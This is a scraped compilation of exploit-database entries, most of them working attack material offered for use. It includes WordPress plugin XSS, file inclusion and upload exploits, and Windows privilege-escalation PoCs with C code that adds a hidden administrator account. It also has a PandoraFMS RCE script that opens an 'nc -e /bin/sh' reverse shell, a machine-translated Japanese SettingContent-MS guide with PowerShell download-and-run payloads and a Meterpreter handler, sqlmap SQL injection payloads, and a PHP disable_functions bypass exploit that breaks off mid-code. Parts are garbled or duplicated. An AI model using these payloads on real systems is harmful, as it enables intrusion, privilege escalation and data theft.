HireHackking

# Tile: Wordpress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting # Author: mehran feizi # Category: webapps # Date: 2020-02-12 # vendor home page: https://wordpress.org/plugins/tutor/ =================================================================== Vulnerable page: /Quiz.php =================================================================== Vulnerable Source: 473: echo echo $topic_id; 447: $topic_id = sanitize_text_field($_POST['topic_id']); =================================================================== Exploit: localhost/wp-content/plugins/tutor/classes/Quiz.php $_POST('topic_id') = <script>alert('mehran')</script> =================================================================================

# Tile: Wordpress Plugin tutor.1.5.3 - Local File Inclusion # Author: mehran feizi # Category: webapps # Date: 2020-02-12 # vendor home page: https://wordpress.org/plugins/tutor/ =================================================================== Vulnerable page: /instructors.php =================================================================== Vulnerable Source: 3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET); 5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php"; 7: include include $include_file; requires: 4: if(!empty($sub_page)) 6: if(file_exists($include_file)) =================================================================== Exploit: localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI] ================================================================================= contact me: telegram: @MF0584 gmail: mehranfeizi13841384@gmail.com =================================================================== Vulnerable page: /instructors.php =================================================================== Vulnerable Source: 3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET); 5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php"; 7: include include $include_file; requires: 4: if(!empty($sub_page)) 6: if(file_exists($include_file)) =================================================================== Exploit: localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI] =================================================================================

# Exploit Title: OpenTFTP 1.66 - Local Privilege Escalation # Exploit Author: boku # Date: 2020-02-12 # Vendor Homepage: https://sourceforge.net/projects/tftp-server/ # Software Link: https://sourceforge.net/projects/tftp-server/files/tftp%20server%20single%20port/OpenTFTPServerSPInstallerV1.66.exe/download # Version: 1.66 # Tested On: Windows 10 (32-bit) # About: # "MultiThreaded TFTP Server Open Source Freeware Windows/Unix for PXEBOOT, firmware load, support tsize, blksize, timeout Server Port Ranges, # Block Number Rollover for Large Files. Runs as Service/daemon. Single Port version also available." # Downloads: 43,284 This Week - https://sourceforge.net/projects/tftp-server/ # Vulnerability Details: # On Windows, Open TFTP Server v1.66, suffers from insecure file & folder permissions. # This allows a low-privilge, local attacker to escalate their permissions to Administrator; # by replacing the 'TFTPServer' service binary with a maliciously-crafted, binary executable. # The TFTP Server runs as an 'Auto_Start' Service, with 'LocalSystem' priviledges, after the # default installation. After the attacker has planted the malicious binary, the code will # be executed with System priviledges on the next boot of the windows device. See PoC below for details. ## Service Information (there is also an Unquoted Service Path) C:\>sc qc TFTPServer SERVICE_NAME: TFTPServer TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\OpenTFTPServer\OpenTFTPServerSP.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Open TFTP Single Port Server DEPENDENCIES : SERVICE_START_NAME : LocalSystem ## Insecure Folder Permission C:\OpenTFTPServer BUILTIN\Administrators:(OI)(CI)(ID)F NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F BUILTIN\Users:(OI)(CI)(ID)R NT AUTHORITY\Authenticated Users:(ID)C NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C ## Insecure File/Service Permission C:\OpenTFTPServer\OpenTFTPServerSP.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) ## Local Privilege Escalation Proof of Concept #0. Download & install Open TFTP Server v1.66 #1. Create low privileged user & change to the user C:\Users\lowPrivUser>net user lowprivuser | findstr /i "Membership Name" | findstr /v "Full" User name lowPrivUser Local Group Memberships *Users Global Group memberships *None C:\>whoami mycomputer\lowprivuser #2. Move the Service EXE to a new name C:\OpenTFTPServer>move OpenTFTPServerSP.exe ~OpenTFTPServerSP.exe 1 file(s) moved. #3. Create malicious binary on kali linux 1) Download dependencies root@kali# apt install gcc-mingw-w64-i686 wine64 -y 2) Add Admin User C Code root@kali# cat addAdmin.c #include<windows.h> int main(void){ system("net user hacker mypassword /add"); system("net localgroup Administrators hacker /add"); WinExec("C:\\OpenTFTPServer\\~OpenTFTPServerSP.exe",0); return 0; } 3) Compile Code root@kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o OpenTFTPServerSP.exe #4. Transfer created 'OpenTFTPServerSP.exe' to the Windows Host #5. Move the created 'OpenTFTPServerSP.exe' binary to the 'C:\OpenTFTPServer\' Folder C:\>move C:\Users\lowPrivUser\Desktop\OpenTFTPServerSP.exe C:\OpenTFTPServer\ 1 file(s) moved. C:\>dir C:\OpenTFTPServer | findstr "OpenTFTPServerSP.exe" 02/12/2020 05:59 PM 288,659 OpenTFTPServerSP.exe 02/12/2020 06:38 PM 221,560 ~OpenTFTPServerSP.exe #6. Reboot the Computer #7. Look at that new Admin C:\Users\lowPrivUser>net users hacker | findstr "Local name active" User name hacker Account active Yes Local Group Memberships *Administrators *Users C:\Users\lowPrivUser>net localgroup Administrators Alias name Administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator boku hacker

# Exploit Title: PANDORAFMS 7.0 - Authenticated Remote Code Execution # Date: 2020-02-12 # Exploit Author: Engin Demirbilek # Vendor homepage: http://pandorafms.org/ # Version: 7.0 # Software link: https://pandorafms.org/features/free-download-monitoring-software/ # Tested on: CentOS # CVE: CVE-2020-8947 #!/bin/python ''' PANDORAFMS 7.0 Authenticated Remote Code Execution x4 This exploits can be edited to exploit 4x Authenticated RCE vulnerabilities exist on PANDORAFMS. incase default vulnerable variable won't work, change the position of payload to one of the following ip_src, dst_port, src_port Author: Engin Demirbilek Github: github.com/EnginDemirbilek CVE: CVE-2020-8947 ''' import requests import sys if len(sys.argv) < 6: print "Usage: ./exploit.py http://url username password listenerIP listenerPort" exit() url = sys.argv[1] user = sys.argv[2] password = sys.argv[3] payload = '";nc -e /bin/sh ' + sys.argv[4] + ' ' + sys.argv[5] + ' ' + '#' login = { 'nick':user, 'pass':password, 'login_button':'Login' } req = requests.Session() print "Sendin login request ..." login = req.post(url+"/pandora_console/index.php?login=1", data=login) payload = { 'date':"", 'time':"", 'period':"", 'interval_length':"", 'chart_type':"", 'max_aggregates':"1", 'address_resolution':"0", 'name':"", 'assign_group':"0", 'filter_type':"0", 'filter_id':"0", 'filter_selected':"0", 'ip_dst':payload, 'ip_src':"", 'dst_port':"", 'src_port':"", 'advanced_filter':"", 'aggregate':"dstip", 'router_ip':"", 'output':"bytes", 'draw_button':"Draw" } print "[+] Sendin exploit ..." exploit = req.post(url+"/pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0",cookies=req.cookies, data=payload, headers={ 'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0', 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Encoding':'gzip, deflate', 'Content-Type':'application/x-www-form-urlencoded'}) if exploit.status_code == 200: print "[+] Everything seems ok, check your listener. If no connection established, change position of payload to ip_src, dst_port or src_port." else: print "[-] Couldn't send the HTTP request, try again."

# Tile: Wordpress Plugin contact-form-7 5.1.6 - Remote File Upload # Author: mehran feizi # Category: webapps # Date: 2020-02-11 # vendor home page: https://wordpress.org/plugins/contact-form-7/ Vulnerable Source: 134: move_uploaded_file move_uploaded_file($file['tmp_name'], $new_file)) 82: $file = $_FILES[$name] : null; 132: $new_file = path_join($uploads_dir, $filename); 122: $uploads_dir = wpcf7_maybe_add_random_dir($uploads_dir); 121: $uploads_dir = wpcf7_upload_tmp_dir(); 131: $filename = wp_unique_filename($uploads_dir, $filename); 122: $uploads_dir = wpcf7_maybe_add_random_dir($uploads_dir); 121: $uploads_dir = wpcf7_upload_tmp_dir(); 128: $filename = apply_filters('wpcf7_upload_file_name', $filename, $file['name'], $tag); 126: $filename = wpcf7_antiscript_file_name ($filename); 125: $filename = wpcf7_canonicalize ($filename, 'as-is'); 124: $filename = $file['name']; 82: $file = $_FILES[$name] : null; 82: $file = $_FILES[$name] : null; 78: ⇓ function wpcf7_file_validation_filter($result, $tag) Exploit: <?php $shahab="file.jpg"; $ch = curl_init("http://localhost/wordpress/wp-content/plugins/contact-form-7/modules/file.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('zip'=>"@$shahab")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result = curl_exec($ch); curl_close($ch); print "$result"; ?> Location File: http://localhost/wordpress/wp-content/plugins/contact-form-7/file.jpg

# Tile: Wordpress Plugin wordfence.7.4.5 - Local File Disclosure # Author: mehran feizi # Category: webapps # Date: 2020-02-12 # vendor home page: https://wordpress.org/plugins/wordfence/ ============================================================================== Vulnerable Source: 5662: readfile readfile($localFile); 5645: $localFile = ABSPATH . preg_replace('/^(?:\.\.|[\/]+)/', '', sanitize_text_field($_GET['file'])); ================================================================================= Exploit: localhost/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=[LFD] =================================================================================

# Title : WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion # Author : mehran feizi # Vendor : https://wordpress.org/plugins/ultimate-member/ # Category : Webapps # Date : 2020-02-11 # Vendor home page: https://wordpress.org/plugins/ultimate-member/ Vulnerable Page: /class-admin-upgrade.php Vulnerable Source: 354: if(empty($_POST['pack'])) else 356: include_once include_once $this->packages_dir . DIRECTORY_SEPARATOR . $_POST['pack'] . DIRECTORY_SEPARATOR . 'init.php'; Exploit: localhost/wp-content/plugins/worprees plugin bug dar/ultimate-member/includes/admin/core/class-admin-upgrade.php $_POST('pack')=<script>alert('xss')</script>

0x00 SettingContent-MSファイルの紹介 .SettingContent-MSはWindows 10で導入されたファイルタイプです。そのコンテンツはXML形式で記述されており、主にWindows設定ページのショートカットを作成するために使用されます。 Windows 10の下流。 settentcontent-msの接尾辞を備えたファイル。システムは、このクラスファイルのパスがコントロールパネルの関連ディレクトリにあるかどうかを判断するのではなく、コントロールパネル設定に関連するコントロールパネル設定に使用されるファイルのディープリンクタグで指定されたプログラムを直接実行し、ユーザーがシステムのディレクトリでそのようなファイルを実行したり、ネットワークからダウンロードした慎重に設計されたファイルを実行したりします。 SettingContent-MSファイルは、その中で指定された悪意のあるプログラムオブジェクトを直接実行し、任意のコード実行をもたらします。 このファイルには、パラメーターを含むバイナリファイルを使用して実行するディープリンクタグが含まれています。これは問題を引き起こす可能性があります。攻撃者は、CMD.exeやPowershell.exeなどのバイナリファイルを指すDeeplink要素を使用して.settingContent-MSファイルを作成でき、シェルコマンドの実行を提供します。 0x01 Windows Defender AV ASRルール Windows Defender AV ASRルールは、主にマルウェアをエクスプロイットするコンピューターやアプリケーションに感染するのを防ぐために設計されています。 Windows 10、バージョン1709以降、およびWindows Server 2016で導入されました。WindowsDefenderの以前のバージョンはすべてASRルールでは利用できませんでした。 Windows 10バージョン1703〜1803およびWindows Serverバージョン1709から1803から始めます。次の図は、Windows Defender AV ASRルールがAttackSurfacereductionRules_IDS関数ルールに付属していることを示しています。 また、このバージョン以下の10240では、Windows Defender AV ASRルールにはastationSurfacereductionRules_idsがありません 注：ある時点で、搾取の失敗はファイルの場所（デフォルトのポリシー設定）に依存するため、POCファイルを次のディレクトリにコピーして実行するだけです。 （デフォルトのパスを変更すると、管理者の特権を使用してコマンドscmwrap.exe -installを実行できます） c: \ uses \ [user] \ appdata \ local \ packages \ windows.immersivecontrolpanel_cw5n1h2txyewy \ localstate \ indexed \ settings \ [言語] \ 0x02脆弱性の再発 1。簡単なテストポップアップ計算機 1。テストPCファイルを次のディレクトリに入れます。 c: \ users \ admin（user） \ appdata \ local \ packages \ windows.immersivecontrolpanel_cw5n1h2txyewy \ localstate \ indexed \ settings \ zh-cn \ directory 2。クリックしてPOCファイルをテストします。 ？xmlバージョン='1.0'エンコード='utf-8'？ pcsettings SearchAbleContent XMLNS='http://Schemas.microsoft.com/search/2013/SettingContent' ApplicationInformation appidwindows.immersivecontrolpanel_cw5n1h2txyewy！microsoft.windows.immersivecontrolpanel/appid Deeplink％Windir％\ System32 \ cmd.exe /c calc.exe /deeplink ICON％Windir％\ System32 \ Control.exe/Icon /ApplicationInformation 設定 pageid/pageid HOSTID {12B1697E-D3A0-4DBC-B568-CCF64A3F934D}/HOSTID /settingidentity 設定情報 説明@shell32.dll、-4161/description keywords@shell32.dll、-4161/キーワード /設定情報 /SearchAbleContent /pcsettings その他のディープリンク…/deeplinkは、poc:を置き換えることができます 1。Windir％\ System32 \ cmd.exe /C 'C: \ Program Files \ Internet Explorer \ iexplore.exe' -K https://www.backlion.org/ 2。SystemRoot％\ System32 \ WindowsPowerShell \ V1.0 \ PowerShell.Exe -Wind Hidden -Noni -NONOGO -COMM '（New -Object System.Net.WebClient）.DownLoadFile（' 3http://192.168.225.129/PWN.EXE ' $ env3360Appdata+'\ svrcheck.exe'）; Start-Process $ env:Appdata '\ svrcheck.exe'; exit-pssession; ' 3。PowerShell-WindowsStyle Hidden（new-Objectsystem.net.WebClient）downloadFile（ 'https://www.xxx.com/test.exe'、％appdata％\ rundll32.exe '）; start-cess'％appdata％\ rundll32.exe '' 4。WMICOS GET /format:'https://gist.githubusercontent.com/caseysmithrc/68924cabbeca1285D2941298A5B91C24/78065CA63504C9A0F411071377FBE861DE487E44D4D4D4D4D4D4D4D4D4D4D4D4D4D4/ 3. [テスト]をクリックします。コンテンツMSを設定して計算をポップアップします 2。オフィスに埋め込み、計算機をポップアップします 1。単語を作成します。ここでは、Offcie2007を例として使用します 2。ファイルによって作成されたポイント挿入オブジェクト選択 4.アイコンをダブルクリックして開くと、計算機がポップアップします。 3.Kaliリバウンドシェル スクリプトを使用してアドレスをダウンロードする： https://raw.githubusercontent.com/backlion/demo/master/auto_settingcontent-ms.py 1.スクリプトを実行するauto_settingcontent-ms.py kaliの下で、リスニングIPアドレス（kaliネイティブホストIP）とポートに記入します root@kali2018:/opt＃python auto_settingcontent-ms.py 2。TEST.SETTINGCONTENT-MSは現在のディレクトリで生成され、生成されたライセンスが/var/www/htmlディレクトリに自動的にコピーされます。 5。Apacheサービスをオンにします。 root@kali2018:/opt＃service apache2 start 6. MSFを起動してから、IPアドレスを設定し、リスニングポートとペイロードを設定します MSFはExploit/Multi/Handlerを使用します MSF Exploit（Multi/Handler）Payload Windows/MeterPreter/Reverse_httpsを設定します MSF Exploit（Multi/Handler）にオプションが表示されます MSF Exploit（Multi/Handler）セットLHOST 10.250.117.10 MSF Exploit（Multi/Handler）Set LPort 5555 MSF Exploit（Multi/Handler）Exploit 7.生成されたtest.settingContent-msをコピーしてから、新しいtest.docドキュメントを作成し、データを挿入します 8.次に、[test.docx]をクリックして、ドキュメントを開き、アイコンをクリックしてバウンスします。 9. Kaliの下にリバウンドターゲットシステムシェルが表示されます。 0x03脆弱性はバージョンに影響します 32ビットシステム用のWindows 10バージョン1703 4343885 セキュリティの更新 リモートコード実行 重要 4338826 X64ベースのシステム用Windows 10バージョン1703 4343885 セキュリティの更新 リモートコード実行 重要 4338826 32ビットシステム用のWindows 10バージョン1709 4343897 セキュリティの更新 リモートコード実行 重要 4338825 64ビットシステム用のWindows 10バージョン1709 4343897 セキュリティの更新 リモートコード実行 重要 4338825 32ビットシステム用のWindows 10バージョン1803 4343909 セキュリティの更新 リモートコード実行 重要 4338819 X64ベースのシステム用Windows 10バージョン1803 4343909 セキュリティの更新 リモートコード実行 重要 4338819 Windows Server、バージョン1709（サーバーコアインストール） 4343897 セキュリティの更新 リモートコード実行 重要 4338825 Windows Server、バージョン1803（サーバーコアインストール） 4343909 セキュリティの更新 リモートコード実行 重要 4338819 0x04脆弱性防御の提案 ファイアウォールや電子メールゲートウェイで実行して、settingContent-MSファイルをブロックするのが最善です。さらに、グループポリシーを使用して強制することを検討する必要があります。SettingContent-MSは、メモ帳（https://montour.co/2016/09/group-policy-force-js-files/）で開くことを禁止されています。 0x05参照リンク https://www.t00ls.net/thread-47622-1-1.html https://hk.saowen.com/a/18EA08A24EFD7D58C9D24CE69CAD41AAC8E1535026D266A3E6CED826D77777A341 https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39 https://github.com/joesecurity/scmwrap https://github.com/sscyber0/deeplink_reverse_tcp

# Title: phpMyChat Plus 1.98 - 'pmc_username' SQL Injection # Date: 2020-02-13 # Exploit Author: J3rryBl4nks # Vendor Homepage: http://ciprianmp.com/latest/ # Software Link: https://sourceforge.net/projects/phpmychat/files/phpMyChat_Plus/ # Version MyChat Plus 1.98 # Tested on Windows 10/Kali Rolling # The phpMyChat Plus 1.98 application is vulnerable to Sql Injection # (Boolean based blind, Error-based, time-based blind) on the deluser.php page # through the pmc_user parameter. # POC code: # Capture the request through Burpsuite: POST /plus/deluser.php HTTP/1.1 Host: HOSTNAME User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://HOSTNAME/plus/deluser.php Content-Type: application/x-www-form-urlencoded Content-Length: 77 Connection: close Cookie: CookieLang=english; temp=temp; CookieUsername=testing; CookieRoom=Public%2BRoom%2B1; CookieRoomType=1; CookieStatus=r; PHPSESSID=0srffkdt9nu2jis443pp9nh3i9 Upgrade-Insecure-Requests: 1 L=english&Link=&LIMIT=0&pmc_username=test&pmc_password=test&login_form=Log+In # Then use sqlmap to get the user tables: sqlmap -r deleteuserlogin.req --level=5 --risk=3 --dbms=mysql --tamper=unmagicquotes -D DBNAME --dump -T c_reg_users -p pmc_username Parameter: pmc_username (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: L=english&Link=&LIMIT=0&pmc_username=test' AND 9736=(SELECT (CASE WHEN (9736=9736) THEN 9736 ELSE (SELECT 2847 UNION SELECT 9983) END))-- qEHq&pmc_password=test&login_form=Log In Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: L=english&Link=&LIMIT=0&pmc_username=test' OR (SELECT 7708 FROM(SELECT COUNT(*),CONCAT(0x7170627a71,(SELECT (ELT(7708=7708,1))),0x7162627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ShDx&pmc_password=test&login_form=Log In Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: L=english&Link=&LIMIT=0&pmc_username=test' AND (SELECT 5588 FROM (SELECT(SLEEP(5)))wWnk)-- FHPh&pmc_password=test&login_form=Log In

# PoC for the SWAPGS attack ([CVE-2019-1125](https://nvd.nist.gov/vuln/detail/CVE-2019-1125)) This holds the sources for the SWAPGS attack PoC publicly shown at Black Hat USA, 2019. ## Contents * leakgsbkva - variant 1 (look for random values in kernel memory; limited to PE kernel image header) * leakgsbkvat - variant 2 (extract random values from kernel memory; limited to PE kernel image header) * whitepaper * Black Hat USA 2019 presentation ## Prerequisites 1. Visual Studio 2015 2. Unpatched Windows x64 (7 or newer) ## Authors * Andrei Vlad LUȚAȘ * Dan Horea LUȚAȘ ## Additional resources [Video Recording of presentation at Black Hat USA, 2019](https://www.youtube.com/watch?v=uBPry7jcfBE) Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48071.zip

# Exploit Title: EPSON EasyMP Network Projection 2.81 - 'EMP_NSWLSV' Unquoted Service Path # Discovery by: Roberto Piña # Discovery Date: 2020-02-13 # Vendor Homepage: https://epson.com/support/easymp-network-projection-v2-86-for-windows # Software Link :https://ftp.epson.com/drivers/epson16189.exe # SEIKO EPSON CORP # Tested Version: 2.81 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Home x64 en # Step to discover Unquoted Service Path: C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "EPSON" | findstr /i /v """ EMP_NSWLSV EMP_NSWLSV C:\Program Files (x86)\EPSON Projector\EasyMP Network Projection V2\EMP_NSWLSV.exe Auto C:\>sc qc "EMP_NSWLSV" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: EMP_NSWLSV TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\EPSON Projector\EasyMP Network Projection V2\EMP_NSWLSV.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : EMP_NSWLSV DEPENDENCIES : RPCSS SERVICE_START_NAME : LocalSystem #Exploit: # A successful attempt would require the local user to be able to insert their code in the system root path # undetected by the OS or other security applications where it could potentially be executed during # application startup or reboot. If successful, the local user's code would execute with the elevated # privileges of the application.

# Exploit Title: SprintWork 2.3.1 - Local Privilege Escalation # Exploit Author: boku # Date: 2020-02-13 # Vendor Homepage: https://veridium.net # Software Link: https://veridium.net/files_u/spx/exe/SprintWork-Setup.exe # Version: 2.3.1 # Tested On: Windows 10 (32-bit) # Vulnerability Overview: # SprintWork v2.3.1 (x86) suffers from insecure file & service & folder permissions, unquoted service paths, # and a missing executable for one of the two Service it installs; to be ran as 'LocalSystem'. # This allows any local user to gain persistent code-execution as 'LocalSystem'. # Both the 32bit & 64bit build of SprintWork v2.3.1 create the services 'SP52 AMC' & 'SprintWork TM VI', with the "StartMode" set to 'Auto', to be ran as 'LocalSystem'; these services will ran every time the computer starts. The 'SP52 AMC' Service is set to use the 'nvlsimw.exe' file. On the 32bit version, the 'nvlsimw.exe' file is never created. This, in combination with its other vulnerabilities, results in persistent code-execution for any local user as 'LocalSystem'. # See Proof of Concept below for full details. # About: # "SprintWork Distraction Blocker -- Block Social Networks and Games, Track Time Spent on Websites and Programs, Maximize Productivity # + Block or time restrict social networks, online games or any website # - Block web distractions including social media, addictive gaming websites, video streaming websites or any website wasting your time. # + Block or time restrict games and programs # - Usage of non-work related applications can be blocked or limited to certain times of day, days of week or restricted to a total amount of time per day. # + Detailed activity monitoring and reporting # - Records time spent actively using programs, total run time of each program and start and end times of usage sessions as well as details of visited websites including time and total duration of visits. # + Selective user monitoring and blocking. # - Can exclude certain computer users from blocking rules and monitoring of activity. Useful for shared and family computers. # + Wildcard support # - Block websites that have certain words in their addresses or block an entire domain or only a specific sub-domain. # + Multiple website blocking lists. # - Block or set time restrictions collectively for groups of websites. # + Cannot be bypassed, deleted or disabled. # - Works with all browsers and Internet clients and cannot be forcefully stopped, disabled or uninstalled unless the lock time you've chosen expires and only after you enter your password." # - https://veridium.net/sprintwork/ ## Service Information (there is also an Unquoted Service Path) C:\>wmic service get name,pathname,startmode,StartName | findstr /v "C:\Windows" | findstr /i /c:Sprintwork SP52 AMC C:\Program Files\SprintWork\nvlsimw.exe Auto LocalSystem SprintWork TM VI C:\Program Files\SprintWork\nvlsim.exe Auto LocalSystem ## Missing Executable file 'nvlsimw.exe' for the 'SP52 AMC' service C:\>dir "C:\Program Files\SprintWork\" | findstr /i /c:"exe" 11/23/2019 10:20 PM 1,345,536 NVLSIM.EXE 12/25/2019 02:47 PM 1,202,688 qcden.exe 12/25/2019 02:47 PM 14,436,864 SprintWork.exe 11/23/2019 10:20 PM 1,557,504 txew.exe ## Insecure Folder Permission C:\>icacls "C:\Program Files\SprintWork" C:\Program Files\SprintWork BUILTIN\Users:(F) BUILTIN\Users:(OI)(CI)(IO)(F) ## Insecure File/Service Permission C:\>icacls "C:\Program Files\SprintWork\NVLSIM.EXE" C:\Program Files\SprintWork\NVLSIM.EXE BUILTIN\Users:(I)(F) ## Local Privilege Escalation Proof of Concept #0. Download & install SprintWork v2.3.1 (x86) on Windows 10 32bit Operating System #1. Create low privileged user C:\Windows\system32>net user lowpriv password /add #2. Change to lowpriv User C:\Users\lowPrivUser>net user lowprivuser | findstr /i "Membership Name" | findstr /v "Full" User name lowPrivUser Local Group Memberships *Users Global Group memberships *None C:\>whoami mycomputer\lowprivuser #3. Create malicious binary on Kali Linux 3.1) Download dependencies root@kali# apt install gcc-mingw-w64-i686 wine64 -y 3.2) Create Add Admin User C Code root@kali# cat addAdmin.c #include<windows.h> int main(void){ system("net user adminpriv mypassword /add"); system("net localgroup Administrators adminpriv /add"); return 0; } 3.3) Compile Code root@kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o nvlsimw.exe #4. Transfer created 'nvlsimw.exe' to the Windows Host #5. Move the created 'nvlsimw.exe' binary to the 'C:\Program Files\SprintWorks\' Directory C:\Users\lowpriv>move nvlsimw.exe "C:\Program Files\SprintWork\" 1 file(s) moved. C:\Users\lowpriv>dir "C:\Program Files\SprintWork\" | findstr /i /c:nvlsim 11/23/2019 10:20 PM 1,345,536 NVLSIM.EXE 02/13/2020 06:07 PM 288,469 nvlsimw.exe #6. Verify localgroup 'Administrators' members C:\Users\lowpriv>net localgroup Administrators Alias name Administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator boku #6. Reboot the Computer C:\Users\lowpriv>shutdown /r /t 0 #7. Verify user 'adminpriv' was created & added to the localgroup 'Administrators' C:\>net localgroup Administrators Alias name Administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator adminpriv boku C:\>net user adminpriv | findstr /C:"User name" /C:active /C:Password /C:Group User name adminpriv Account active Yes Password last set ?2/?13/?2020 6:18:03 PM Password expires Never Password changeable ?2/?13/?2020 6:18:03 PM Password required Yes Local Group Memberships *Administrators *Users Global Group memberships *None

# Exploit Title: HomeGuard Pro 9.3.1 - Insecure Folder Permissions # Exploit Author: boku # Date: 2020-02-13 # Vendor Homepage: https://veridium.net # Software Link: https://veridium.net/files_u/hg-pro/exe/HomeGuardPro-Setup.exe # Version 9.3.1 # Tested On: Windows 10 (32-bit) # HomeGuard Pro v9.3.1 - Unquoted Service Path + Insecure Folder/File/Service Permissions ## Service Information (Unquoted Service Path) C:\>wmic service get Name,PathName,StartMode,StartName | findstr /v "C:\Windows" | findstr /i /v """ Name PathName StartMode StartName HG52 AM VI C:\Program Files\HomeGuard Pro\vglset.exe Auto LocalSystem HG52 AMC C:\Program Files\HomeGuard Pro\vglsetw.exe Auto LocalSystem HG52 AM REM C:\Program Files\HomeGuard Pro\vglrem.exe Auto LocalSystem HG52 AM SRV C:\Program Files\HomeGuard Pro\vglserv.exe Auto LocalSystem ## Insecure Folder Permission C:\>icacls "C:\Program Files\HomeGuard Pro" | findstr /i "Users" C:\Program Files\HomeGuard Pro BUILTIN\Users:(F) ## Insecure File/Service Permission C:\>icacls "C:\Program Files\HomeGuard Pro\VGL*" | findstr /i "Users" C:\Program Files\HomeGuard Pro\vglrem.exe BUILTIN\Users:(I)(F) C:\Program Files\HomeGuard Pro\VGLSERV.EXE BUILTIN\Users:(I)(F) C:\Program Files\HomeGuard Pro\vglset.exe BUILTIN\Users:(I)(F) C:\Program Files\HomeGuard Pro\vglsetw.exe BUILTIN\Users:(I)(F)

<?php # PHP 7.0-7.4 disable_functions bypass PoC (*nix only) # # Bug: https://bugs.php.net/bug.php?id=76047 # debug_backtrace() returns a reference to a variable # that has been destroyed, causing a UAF vulnerability. # # This exploit should work on all PHP 7.0-7.4 versions # released as of 30/01/2020. # # Author: https://github.com/mm0r1 pwn("uname -a"); function pwn($cmd) { global $abc, $helper, $backtrace; class Vuln { public $a; public function __destruct() { global $backtrace; unset($this->a); $backtrace = (new Exception)->getTrace(); # ;) if(!isset($backtrace[1]['args'])) { # PHP >= 7.4 $backtrace = debug_backtrace(); } } } class Helper { public $a, $b, $c, $d; } function str2ptr(&$str, $p = 0, $s = 8) { $address = 0; for($j = $s-1; $j >= 0; $j--) { $address <<= 8; $address |= ord($str[$p+$j]); } return $address; } function ptr2str($ptr, $m = 8) { $out = ""; for ($i=0; $i < $m; $i++) { $out .= chr($ptr & 0xff); $ptr >>= 8; } return $out; } function write(&$str, $p, $v, $n = 8) { $i = 0; for($i = 0; $i < $n; $i++) { $str[$p + $i] = chr($v & 0xff); $v >>= 8; } } function leak($addr, $p = 0, $s = 8) { global $abc, $helper; write($abc, 0x68, $addr + $p - 0x10); $leak = strlen($helper->a); if($s != 8) { $leak %= 2 << ($s * 8) - 1; } return $leak; } function parse_elf($base) { $e_type = leak($base, 0x10, 2); $e_phoff = leak($base, 0x20); $e_phentsize = leak($base, 0x36, 2); $e_phnum = leak($base, 0x38, 2); for($i = 0; $i < $e_phnum; $i++) { $header = $base + $e_phoff + $i * $e_phentsize; $p_type = leak($header, 0, 4); $p_flags = leak($header, 4, 4); $p_vaddr = leak($header, 0x10); $p_memsz = leak($header, 0x28); if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write # handle pie $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr; $data_size = $p_memsz; } else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec $text_size = $p_memsz; } } if(!$data_addr || !$text_size || !$data_size) return false; return [$data_addr, $text_size, $data_size]; } function get_basic_funcs($base, $elf) { list($data_addr, $text_size, $data_size) = $elf; for($i = 0; $i < $data_size / 8; $i++) { $leak = leak($data_addr, $i * 8); if($leak - $base > 0 && $leak - $base < $data_addr - $base) { $deref = leak($leak); # 'constant' constant check if($deref != 0x746e6174736e6f63) continue; } else continue; $leak = leak($data_addr, ($i + 4) * 8); if($leak - $base > 0 && $leak - $base < $data_addr - $base) { $deref = leak($leak); # 'bin2hex' constant check if($deref != 0x786568326e6962) continue; } else continue; return $data_addr + $i * 8; } } function get_binary_base($binary_leak) { $base = 0; $start = 